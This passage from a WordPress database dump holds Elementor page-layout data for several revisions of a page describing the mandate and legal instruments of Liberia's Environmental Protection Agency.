Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12540,2047,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(12551,2051,'_elementor_edit_mode','builder'),(12552,2051,'_elementor_template_type','wp-post'),(12553,2051,'_elementor_version','2.7.5'),(12554,2051,'_wp_page_template','default'),(12555,2051,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12558,2052,'_elementor_edit_mode','builder'),(12559,2052,'_elementor_template_type','wp-post'),(12560,2052,'_elementor_version','2.7.5'),(12561,2052,'_wp_page_template','default'),(12562,2052,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12571,2055,'_elementor_edit_mode','builder'),(12572,2055,'_elementor_template_type','wp-post'),(12573,2055,'_elementor_version','2.7.5'),(12574,2055,'_wp_page_template','default'),(12575,2055,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx